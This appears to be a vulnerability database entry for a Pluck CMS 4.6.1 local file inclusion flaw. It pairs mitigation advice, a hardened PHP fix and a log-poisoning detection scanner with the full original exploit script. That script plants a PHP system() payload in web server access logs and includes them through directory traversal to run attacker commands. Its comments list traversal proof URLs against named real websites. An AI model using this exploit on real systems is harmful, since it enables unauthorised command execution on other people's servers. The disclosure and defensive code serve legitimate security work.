vendor: Pluck CMS
by: Alfons Luja
CVSS: 5.5 (MEDIUM)
Vulnerability type: Local File Inclusion (LFI)
CWE: 22
Product Name: Pluck CMS
Affected Version From: 4.6.2001
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Pluck v 4.6.1 LFI exploit

This exploit targets Pluck CMS 4.6.1 and abuses a local file inclusion vulnerability in 'data/modules/blog/module_pages_site.php': the value of the 'post' URL parameter is appended to the posts directory path and handed to include() after nothing more than a file_exists() check, so a traversal string lets an attacker include arbitrary files on the server. The published proof-of-concept URLs pass a traversal path ending in '/bin/ls' through 'post' to confirm the inclusion; the script in the raw data goes further, planting a PHP payload in the web server's access log through the request line and then including that log through the same parameter.

Mitigation:

The entry records no vendor patch, so the immediate fix lies in the vulnerable lookup itself: the 'post' value must be restricted to plain post file names that resolve inside the posts directory before it reaches include(). Beyond that, update to the latest version of Pluck CMS and apply any security patches the vendor releases, and restrict access to sensitive files and directories, including the web server's access logs, which this exploit depends on being readable by the PHP process.
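The lookup quoted in the raw data concatenates $_GET['post'] onto the posts directory and includes whatever exists there. The following is an added example, not Pluck's own code, of a hardened replacement for that block; the constant POSTS_DIR, the helper name resolve_post_file and the file-name allowlist (letters, digits, '-' and '_' plus a .php extension) are assumptions for illustration and should be adapted to the real post naming scheme.

```php
<?php
// Added example, not Pluck CMS code: hardened version of the 'view post'
// lookup in module_pages_site.php. POSTS_DIR, resolve_post_file() and the
// file-name allowlist are assumptions for this illustration.

declare(strict_types=1);

const POSTS_DIR = __DIR__ . '/data/settings/modules/blog/posts';

/**
 * Return the absolute path of a post file inside $postsDir, or null when the
 * requested name is not a plain post file name or does not resolve inside
 * that directory. The checks are layered on purpose:
 *  1. allowlist the characters of a post name (no '/', '\', NUL or '..')
 *  2. resolve symlinks and '..' with realpath() on both sides
 *  3. compare the resolved file against the resolved directory prefix
 */
function resolve_post_file(string $requested, string $postsDir = POSTS_DIR): ?string
{
    // Reject anything outside a conservative allowlist before touching the
    // filesystem (assumed naming scheme, e.g. "20090321-hello.php").
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.php\z/', $requested)) {
        return null;
    }

    $baseDir = realpath($postsDir);
    $target  = realpath($postsDir . '/' . $requested);
    if ($baseDir === false || $target === false) {
        return null;            // directory or file does not exist
    }

    // Prefix check with the separator appended, so a sibling directory such
    // as "posts-old" cannot pass as a child of "posts".
    if (strncmp($target, $baseDir . DIRECTORY_SEPARATOR, strlen($baseDir) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Replacement for the quoted block: include only what resolve_post_file() approved.
$includepage = 'blog_include.php';
if (isset($_GET['post']) && is_string($_GET['post'])) {
    $file = resolve_post_file($_GET['post']);
    if ($file !== null) {
        include $file;
        $module_page['viewpost'] = $post_title;
    } else {
        // Treat a rejected name as "no such post", but record it so traversal
        // attempts are visible in the error log instead of failing silently.
        error_log('blog: rejected post name ' . bin2hex($_GET['post']));
    }
}
```

The is_string() guard matters because a request such as post[]=x turns $_GET['post'] into an array, which would make preg_match() and realpath() raise errors instead of rejecting the value cleanly.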

Exploit-DB raw data:

<?php 

/*
 pluck v 4.6.1 LFI exploit
 author : Alfons Luja
 Vuln is in \data\modules\blog\module_pages_site.php 

  ...

      $includepage = 'blog_include.php';
      //Only set 'view post'-page if a post has been specified
      if (isset($_GET['post'])) {
	//Check if post exists, and include information
	   if (file_exists('data/settings/modules/blog/posts/'.$_GET['post'])) {
		include('data/settings/modules/blog/posts/'.$_GET['post']);
		$module_page['viewpost'] = $post_title;
	   }
      }
 ...

 Nothing to comment ;x
 Greetings: For all friends and obvious for me ;D

 pr00f: 
 http://www.kilgarvangaa.com//data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.southtrewlogcabins.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
 http://www.seanhood.co.uk/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls
*/  
 

if($argc < 5) die("Use: host port path command [www.penatgon.gov 80 /pluck ls]\n"); // four arguments are read below (argv[1]..argv[4])

set_time_limit(0);
error_reporting(0);

$host = $argv[1];
$port = $argv[2];
$path = $argv[3];
$command = $argv[4];

//add something if not w00rking ;x

$shell = array(  
         "<?php echo(' e[Ho_trip ');system('$command');echo(' d34th_trip'); ?>",
         "../apache/logs/access.log",
         "../../apache/logs/access.log",
         "../../../apache/logs/access.log",
         "../../../../apache/logs/access.log",
         "../../../../../apache/logs/access.log",
         "../../../../../../apache/logs/access.log",
         "../../../../../../../apache/logs/access.log",
         "../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../apache/logs/access.log",
         "../../../../../../../../../../../apache/logs/access.log",
         "../var/log/httpd/access.log",
         "../../var/log/httpd/access.log",
         "../../../var/log/httpd/access.log",
         "../../../../var/log/httpd/access.log",
         "../../../../../var/log/httpd/access.log",
         "../../../../../../var/log/httpd/access.log",
         "../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../var/log/httpd/access.log",
         "../../../../../../../../../../../var/log/httpd/access.log",
         "../var/log/apache/access.log",
         "../../var/log/apache/access.log",
         "../../../var/log/apache/access.log",
         "../../../../var/log/apache/access.log",
         "../../../../../var/log/apache/access.log",
         "../../../../../../var/log/apache/access.log",
         "../../../../../../../var/log/apache/access.log",
         "../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../var/log/apache/access.log",
         "../../../../../../../../../../../var/log/apache/access.log",
         "../usr/local/apache2/logs/access.log",
         "../../usr/local/apache2/logs/access.log",
         "../../../usr/local/apache2/logs/access.log",
         "../../../../usr/local/apache2/logs/access.log",
         "../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../usr/local/apache2/logs/access.log",
         "../../../../../../../../../../../usr/local/apache2/logs/access.log", 
   );
function _hdr($int){   // was not supposed to use file_get_contents (author's note, translated from Polish)
       
        global $shell,$host,$path;
        $header  = "GET /$host/$path/$shell[$int]  HTTP/1.1\r\n";
        $header .= "Host: $host\r\n";
        $header .= "User-Agent: _echo [ru] (Win6.66; @)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Accept-Encoding: gzip,deflate\r\n";
        $header .= "Connection: close\r\n\r\n";
        return $header;


}


function _inject($hosts,$ports){
    
           $hnd = fsockopen($hosts,$ports,$errno, $errstr, 30);
           if(!$hnd) die("Injection errr $errstr\n");
           fwrite($hnd,_hdr(0));
           fclose($hnd);  


}

function _result($data){
 
          $ret = explode(' e[Ho_trip ',$data); 
            if($ret[1] != ""){
              for($i = 1;$i<count($ret);$i++){
               $ret_2 = explode(' d34th_trip',$ret[$i]);  
                   if($i - count($ret) == -1){
                     if($ret_2[0] != ""){
                        echo($ret_2[0]);
                     } else {
                        die("Exploit failed!!\n");
                     }
               } 
              }    
               
            }

}

function _exploit($hosts,$paths){

        global $shell;
        $rets = "";
        $count = count($shell);

        for($i=1;$i<$count;$i++){
            
            $tab = file_get_contents("http://".$hosts."/".$paths."/data/modules/blog/module_pages_site.php?post=$shell[$i]");
           _result($tab);
  
        }
 
         
}
echo("---- pluck v 4.6.1 -----\n\n".
     "Autor: Alfons Luja\n".
     "Target: $host\n".
     "Path: $path\n".
     "Port: $port\n".
     "COM: $command\n".
     "Ex: poc.php www.target.com 80 pluck \"dir\"\n\n");

    _inject($host,$port);
    _exploit($host,$path);

?>

# milw0rm.com [2009-03-23]
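The script above leaves two distinct traces in the web server's access log: a traversal string in the 'post' parameter of module_pages_site.php, and a request line carrying a PHP open tag, which is how _hdr() seeds the log before _exploit() includes it. The following is an added example, not part of the Exploit-DB entry, of a scanner that flags both patterns in Apache combined-format log lines; the log lines in SAMPLE_LOG are constructed for this example, and the function names (parse_combined, classify, scan) are arbitrary.

```php
<?php
// Added example, not from the Exploit-DB entry: scanner for Apache "combined"
// access-log lines that flags the request patterns this exploit produces.
// Requires PHP 8.0+ (str_contains / str_starts_with). SAMPLE_LOG is constructed.

declare(strict_types=1);

const VULN_SCRIPT = 'module_pages_site.php';

const SAMPLE_LOG = [
    // traversal via the PoC path
    '203.0.113.5 - - [23/Mar/2009:10:00:01 +0000] "GET /pluck/data/modules/blog/module_pages_site.php?post=../../../../../../../../../../bin/ls HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    // log poisoning: PHP tag planted through the request line (spaces included)
    '203.0.113.5 - - [23/Mar/2009:10:00:02 +0000] "GET /pluck/<?php echo(\' e[Ho_trip \'); ?> HTTP/1.1" 404 209 "-" "_echo [ru] (Win6.66; @)"',
    // double-encoded traversal pointing at the access log
    '203.0.113.5 - - [23/Mar/2009:10:00:03 +0000] "GET /pluck/data/modules/blog/module_pages_site.php?post=%252e%252e/%252e%252e/var/log/apache/access.log HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    // benign request for a real post
    '198.51.100.7 - - [23/Mar/2009:10:00:04 +0000] "GET /pluck/data/modules/blog/module_pages_site.php?post=20090321-hello.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
];

/** Split one combined-format line into named fields, or return null. The request
 *  line is captured whole and split afterwards because a poisoned URI may contain
 *  spaces, which breaks the usual one-\S+-per-field parse. */
function parse_combined(string $line): ?array
{
    $re = '/^(?<ip>\S+) \S+ \S+ \[(?<time>[^\]]+)\] "(?<request>[^"]*)" (?<status>\d{3}) \S+ "(?<referer>[^"]*)" "(?<agent>[^"]*)"$/';
    if (!preg_match($re, $line, $m)) {
        return null;
    }
    $parts = explode(' ', $m['request']);
    $m['method'] = array_shift($parts);
    if (count($parts) > 0 && str_starts_with(end($parts), 'HTTP/')) {
        array_pop($parts);                      // drop the protocol token
    }
    $m['uri'] = implode(' ', $parts);           // everything in between is the URI
    return $m;
}

/** Return a list of findings for one line (empty when nothing is suspicious). */
function classify(string $line): array
{
    $r = parse_combined($line);
    if ($r === null) {
        return ['unparsable line'];
    }
    $findings = [];

    // 1. Traversal in the 'post' parameter of the vulnerable script. parse_str()
    //    decodes once, like $_GET does; the extra rawurldecode() catches %252e.
    $query = (string) parse_url($r['uri'], PHP_URL_QUERY);
    parse_str($query, $params);
    if (str_contains($r['uri'], VULN_SCRIPT) && isset($params['post']) && is_string($params['post'])) {
        $post = rawurldecode($params['post']);
        if (str_contains($post, '..') || str_starts_with($post, '/') || str_contains($post, "\0")) {
            $findings[] = 'LFI traversal in post=' . addcslashes($post, "\0..\37");
        }
    }

    // 2. Log poisoning: a PHP open tag in the request line or User-Agent, which is
    //    how the exploit seeds the access log before including it via 'post'.
    foreach (['request line' => rawurldecode($r['uri']), 'User-Agent' => $r['agent']] as $where => $value) {
        if (preg_match('/<\?(php|=)?/i', $value)) {
            $findings[] = "PHP open tag in $where (log poisoning attempt)";
        }
    }
    return $findings;
}

/** Map each line index to its findings, dropping clean lines. */
function scan(array $lines): array
{
    $report = [];
    foreach ($lines as $i => $line) {
        $f = classify($line);
        if ($f !== []) {
            $report[$i] = $f;
        }
    }
    return $report;
}

foreach (scan(SAMPLE_LOG) as $i => $findings) {
    printf("line %d: %s\n", $i + 1, implode('; ', $findings));
}
```

Run with php on a real log by replacing SAMPLE_LOG with file($path, FILE_IGNORE_NEW_LINES). The first three constructed lines are reported and the fourth is silent; the poisoning rule deliberately matches the PHP tag before any include happens, so it fires on the seeding request even when the later inclusion is never attempted.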